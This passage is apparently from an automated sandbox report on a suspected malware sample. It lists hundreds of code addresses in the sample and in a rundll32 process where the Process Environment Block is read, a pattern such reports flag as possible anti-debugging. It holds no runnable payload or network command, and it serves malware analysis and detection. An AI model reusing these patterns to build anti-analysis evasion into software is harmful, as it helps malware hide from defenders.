          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04638E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04648EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046846A7 mov eax, dword ptr fs:[00000030h]
